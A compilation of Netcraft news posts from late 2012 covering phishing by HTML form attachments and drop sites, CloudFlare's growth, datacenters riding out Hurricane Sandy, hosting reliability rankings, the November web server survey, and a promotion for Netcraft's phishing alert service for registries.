Phishing attacks using HTML attachments

Netcraft has recently seen an increase in the number of phishing attacks using attached HTML forms to steal victims' credentials. This type of attack is not new - we have received reports of them from our phishing community since 2005 - but have become more popular amongst fraudsters during this year.

The attack works in a conventional way with the distinction that instead of linking to a form hosted on a web server, the form is attached to the mail.

Example drop site mail

A drop site phishing mail against Barclays customers asking the recipient to complete the attached form.

On opening the attachment, the form asks the victim to fill in their credentials. However, because the form is stored locally, it is less likely to be blocked by anti-phishing mechanisms. Some attachments also make use of obfuscated JavaScript to try and prevent anti-phishing software detecting the fraudulent content.

Form attachment screenshot

The form is hosted locally on the user's own computer.

Nevertheless these phishing attacks still have to send the sensitive data to the fraudster. This communication is usually done by sending a POST request to a remote web server, which then processes the information. This POST request can be detected and blocked, thus the user can still be protected. For example, a web browser, or a piece of security software or spam filter can use Netcraft's Phishing Site Feed to detect the phishing attack and block it.

Code snippet of the HTML form element

The form posts the details to a remote web-server.

These phishing attacks are sometimes referred to as "drop site" phishing attacks. This is because the only publicly accessible URL is a page into which the victim's details are "dropped". Drop sites can be difficult to recognise without the accompanying phishing mail. Usually, the "drop" page just processes the victim's details and provides no indication as to its true nature. Some drop sites redirect to the target's real website. This merits suspicion for anti-phishing groups, but may not provide enough evidence for them to block the URL without the accompanying mail.

HTTP Headers for an example drop site

Without the accompanying mail, the drop site URL appears to just be a page that redirects.

Netcraft has recently made improvements to its detection and handling of drop sites, which should be reported to Netcraft by forwarding the original phishing mail, including the HTML attachment(s), to scam@netcraft.com.

As of 1st November 2012, the Netcraft Toolbar community has blocked over 5.5 million phishing attacks. To provide an incentive for the community to continue sending Netcraft reports of phishing sites, Netcraft currently sends reporters the following:

Prize When
Netcraft Branded Mug after 100 validated phishing reports
Netcraft Polo Shirt after 400
Targus Laptop Backpack after 1,000
iPad after 5,000

As a further incentive, reporters become eligible for a separate competition when they reach 5,000 validated reports. To track the progress, we have a leaderboard displaying the people with the largest number of accepted reports so far this month.

CloudFlare accelerates 235,000 websites

Just over two years since its launch, the CloudFlare content distribution network is being actively used to accelerate traffic to more than 235,000 websites in Netcraft's Web Server Survey. In total, we found 785,000 sites currently configured to use CloudFlare's DNS servers. Once a domain has been configured to use these servers, any of its subdomains can be routed through the CloudFlare system at the click of a button. Paying customers can also route their traffic through CloudFlare by setting up a CNAME within their own DNS.

CloudFlare's network is globally spread across 23 datacenters, half of which are entirely remotely operated. Nine of these datacenters were opened during a month-long expansion effort which ended in August and resulted in a 70% increase in network capacity. CloudFlare's content distribution network spreads website content around these datacenters, allowing visitors to request pages from geographically closer locations. This typically reduces the number of network hops, resulting in an average request taking less than 30ms.

In addition to moving static files closer to visitors, CloudFlare also offers an automatic web optimisation feature called Rocket Loader. This combines multiple JavaScript files into a single request, which saves both time and bandwidth. Pro, Business and Enterprise users can also enable beta support for SPDY requests, which achieve better latency than HTTP through the use of compression, multiplexing and prioritisation.

In October, CloudFlare introduced support for OCSP stapling, which it claims has increased the speed of SSL requests by 30%. The Online Certificate Status Protocol allows browsers to ask a certificate authority (CA) whether an SSL certificate it has issued has been revoked. Handling these requests in realtime can be challenging, particularly if the CA has issued a large number of certificates, or has issued certificates to extremely busy websites. OCSP stapling solves this problem by delivering the OCSP response directly from CloudFlare's network, removing the need for the browser to perform an additional DNS lookup and send a request to the CA's own OCSP server. OCSP performance is often overlooked when considering which CA to buy a certificate from, but can have a crucial impact on the overall performance of a customer's website.

With its insight into the kind of requests being sent to many different websites, CloudFlare is well-positioned to identify malicious traffic and provide protection to all of its customers. Depending on which level of security is enabled, CloudFlare can deny requests which are attempting SQL injection attacks, comment spam, excessive crawling, email harvesting, or exploiting cross-site scripting vulnerabilities. Business and Enterprise users can also benefit from CloudFlare's advanced DDoS (distributed denial of service) protection.

CloudFlare's growth accelerated significantly in the summer of last year. This is when many people first became aware of the service, after it was used to handle traffic for the Lulz Security website. High profile attacks against Sony, Fox, PBS and the X Factor helped LulzSec garner 350,000 followers on Twitter, where it extolled the virtues of using CloudFlare to mitigate DDoS attacks.

Some notable high-traffic users of CloudFlare include The Hacker News, Uber Humor, Android firmware site Cyanogen Mod, and the content management system Moodle.

New York Internet rides out the storm

New York Internet looks set to make it through the aftermath of Hurricane Sandy with barely a scratch on its uptime or performance.

NYI's New York City datacenter is just a third of a mile away from the 75 Broad Street datacenter (in evacuation Zone A), which flooded during Hurricane Sandy. NYI is crucially further uphill, in Zone C, and was out of reach of the storm surge. Despite widespread power failures within the area, NYI has so far managed to continue operating without suffering from any outages:

Demand for fuel is very high in the areas affected by the storm. Phillip Koblence, founder of NYI, said that poor availability of gasoline for staff to get to and from datacenters was his worst problem, followed by sleeping and washing facilities. Queues to get gasoline were reportedly two miles long, and vehicles containing fewer than 3 people were not being allowed into Manhattan between 6am and midnight.

Koblence told Netcraft that he had no power or water at home, and difficulties getting food anywhere near work were also adding to the problems. NYI expected commercial power to be shut off as the storm hit, and its New Jersey and New York City datacenters have been running on diesel generators since Monday.


NYI's New York City datacenter is only a few blocks
away from the flooded 75 Broad Street datacenter.

NYI estimates that its 21st floor generator tank in Manhattan can last for 36 hours, while its 8th floor generator can run for more than 3 days. The Bridgewater datacenter in New Jersey is believed to be capable of lasting at least 10 days on generators, far longer than the times between each fuel delivery that the company has been sustaining this week.

Commercial power is expected to be restored to the datacenters late on Saturday night, although NYI plans to remain on generator power until the commercial power supply becomes stable.

Queuing for gasoline in Bridgewater.

Live performance graphs for www.nyi.net can be viewed here.

Most Reliable Hosting Company Sites in October 2012

Rank Company site OS Outage
hh:mm:ss
Failed
Req%
DNS Connect First
byte
Total
1 Datapipe FreeBSD 0.000 0.071 0.018 0.038 0.057
2 Qube Managed Services Linux 0:00:00 0.007 0.132 0.071 0.142 0.142
3 XILO Communications Ltd. Linux 0:00:00 0.007 0.331 0.132 0.388 0.668
4 iWeb Linux 0:00:00 0.010 0.137 0.085 0.171 0.171
5 INetU Windows Server 2008 0:00:00 0.013 0.092 0.090 0.266 0.535
6 www.logicworks.net Linux 0:00:00 0.017 0.212 0.089 0.444 0.683
7 Server Intellect Windows Server 2008 0:00:00 0.017 0.058 0.107 0.215 0.537
8 Multacom FreeBSD 0:00:00 0.017 0.143 0.117 0.236 0.600
9 ReliableServers.com Linux 0:00:00 0.020 0.371 0.097 0.200 0.282
10 Swishmail FreeBSD 0:00:00 0.024 0.127 0.071 0.141 0.285

See full table

Datapipe was the most reliable hosting company in October, impressively responding to all requests throughout the month, despite being in the area most affected by Hurricane Sandy.

Datapipe's corporate offices are based in the heart of Jersey City, very close to areas where analysts had predicted a 100% probability of a storm surge higher than 6 feet. The southern tip of Manhattan eventually experienced a storm surge of 13 feet. Datapipe founder and CEO Robb Allen told Netcraft that the effects of the storm were also felt as far inland as Somerset, where Datapipe's New Jersey datacenters are based.

After the grid became unstable on Monday, Datapipe switched to generators for their datacenter power supply. Even though their diesel reservoir was large enough to last at least four days, Datapipe also stationed additional fuel trucks on site in case roads became impassable.

Allen noted that previous events including grid blackouts, Hurricane Irene and 9/11 have all helped the internet connectivity and hosting industry in the US north east be better prepared for emergencies, though that there is currently a lot of strain on fuel delivery systems.

Datapipe's performance and uptime remained remarkably calm before, during, and after the storm, in stark contrast to destruction depicted in photos taken during the event.

When there isn't a storm brewing, Datapipe runs its United States data centers on entirely renewable energy and is recognized by the Environmental Protection Agency as a Green Power Partner. Datapipe's other US datacenters are located in San Jose and North Virginia.

Datapipe also has datacenters in Iceland, London, Shanghai and Hong Kong. The location of the Iceland datacenter allows for free cooling and runs on 100% renewable power using only geothermal and hydroelectric energy sources. The physical infrastructure has been built with steel instead of concrete, making much of it recyclable at the end of its life.

Netcraft measures and makes available the response times of around forty leading hosting providers' sites. The performance measurements are made at fifteen minute intervals from separate points around the internet, and averages are calculated over the immediately preceding 24 hour period.

From a customer's point of view, the percentage of failed requests is more pertinent than outages on hosting companies' own sites, as this gives a pointer to reliability of routing, and this is why we choose to rank our table by fewest failed requests, rather than shortest periods of outage. In the event the number of failed requests are equal then sites are ranked by average connection times.

Information on the measurement process and current measurements is available.

November 2012 Web Server Survey

In the November 2012 survey we received responses from 625,329,303 sites, a modest increase of 4.8 million sites since last month's survey.

Apache has continued its declining trend in market share, suffering the greatest loss this month of 0.77 percentage points. Although it still captures the majority of the market with a share of 57.23%, this has fallen from 65.00% since this time last year. Conversely, Microsoft enjoyed the largest gain this month, upping its share by 0.25 to 16.52% this month and by 1.07 over the past year.

In absolute terms, Apache lost 2.0 million sites this month, whereas Microsoft gained 2.3 million. nginx also showed significant growth, with an additional 1.2 million sites resulting in a small increase to its market share.

Studying only active sites, the changes in market share are reversed: Apache grew by 0.23 to 55.66%, while Microsoft fell by 0.83 to 11.53%. Within the million busiest sites, nginx was the only major developer to increase its market share, which now stands at 12.22%.

November's survey saw Tumblr suddenly become the tenth largest hosting company by number of sites. The microblogging service previously hosted its customers' sites with Softlayer, but now hosts 9.2 million sites on its own netblock. Softlayer was previously the largest hosting company in the world in terms of hostnames, but this move now places that title in the hands of Go Daddy, who host nearly 6 million sites more than Softlayer.

Many sites using the .tk country code top level domain (ccTLD) disappeared from the survey this month, as non-existent domain names under this ccTLD are no longer resolved by a wildcard DNS configuration. The .tk ccTLD belongs to Tokelau (a territory of New Zealand), and is run by Dot TK - a joint venture between the Government of Tokelau, the communication company Teletok, and BV Dot TK, which is a privately held company with offices in the Netherlands, the UK and the Isle of Man.

Dot TK offers free domain names under the .tk ccTLD, which is also used by its URL shortening service. The April 2012 report by the Anti-Phishing Working Group says that .tk domains were taken advantage of extensively by phishers, and ranked .tk as the top phishing TLD by phish per 10,000 domains in the second half of 2011.

To combat phishing and other fraud, Dot TK introduced an anti-abuse API to allow trusted partners to shut down sites using the .tk ccTLD. The report notes that this has resulted in lower-than-average uptimes for phishing sites, but has not prevented phishers from obtaining and using .tk domains in the first place.

Netcraft has produced a live table of the top 50 phishiest TLDs, based on the ratio of the number of phishing sites to the total number of sites hosted within each TLD. This ranks .tk as only the 22nd phishiest TLD today, while .to (Tonga) currently ranks as the phishiest. The .to ccTLD is run by the Tonga Network Information Center (Tonic), which is one of the few ccTLD operators that does not provide registration information in a WHOIS database. This fact alone must surely contribute to the appeal of using the .to TLD for phishing and other fraud.





DeveloperOctober 2012PercentNovember 2012PercentChange
Apache359,875,51658.00%357,865,21557.23%-0.77
Microsoft101,005,28516.28%103,333,17016.52%0.25
nginx73,243,94411.80%74,437,76411.90%0.10
Google20,947,3403.38%21,090,4103.37%-0.00
Continue reading

Phishing Alerts for Domain Registries

Monitor phishing within your top-level domains

While some registries still perceive phishing as a content issue for hosting companies and registrars, detailed knowledge of phishing activity within their Top Level Domain(s) is very beneficial for registries. It is a key data source for identifying problematic, negligent, or fraud-friendly registrars, and an essential tool for maintaining the reputation of a TLD.

It is common for hosting companies and domain registrars to unknowingly allow their infrastructure to be used for phishing. Even seemingly respectable companies may develop a reputation as a haven for fraud though some systematic deficiency in their working practices, such as a low level of resourcing for abuse related workflow (particularly outside core working hours and during weekends), or inexperienced or less capable staff being unable to recognise and act on fraudulent content.

The most prolific hosts of .net phishing sites, October 2012

Conversely, some criminal registrars and hosting companies specialise in hosting fraudulent content, and even go so far as to advertise their services as "bullet-proof". Bullet-proof hosting companies are typically based in jurisdictions where laws may be hard to apply, and being in an informed position to decline further business from these registrars may greatly aid operational efficiency.


Professionally validated feed, relied upon throughout the Industry

Netcraft's continuously updated, professionally validated phishing feed is used throughout the Internet Infrastructure industry. In addition to Internet registries, all of the main web browsers, along with major anti-virus companies, firewall vendors, SSL Certificate authorities, large hosting companies and domain registrars use Netcraft's feed to protect their user communities. Since Netcraft first launched its anti-phishing system in 2005, over 5.2 million unique phishing sites have been detected and blocked as of September 2012.


Reporting and Analysis

Reports can be refreshed hourly, and also trended over time periods of many months, with analysis by registrar, hosting company, name server, country or phishing target.

.net phishing sites by country, October 2012


Real-time Alerts

When Netcraft validates a phishing report in your TLD, you can receive an alert and can also arrange for alerts to be passed through to registrars. Acting on these individual alerts will demonstrate that your top-level domains are not welcoming to fraud. Fraudsters adjust to these signals within a short period of time, and are themselves quite efficient at moving their operations away from parts of the DNS where they are clearly unwelcome.

A refreshable Excel spreadsheet includes details of the phishing sites under the .net TLD


Case Study - Nominet .uk

Nominet is the registry responsible for managing the .uk domain, which is one of the largest ccTLDs with over 10 million domains registered as of March 2012. Netcraft has provided Nominet with information on phishing using .uk domains since 2009, with alerts made available to individual registrars via an opt-in service.


More information

Please contact us (sales@netcraft.com) for pricing or further details about any of our services.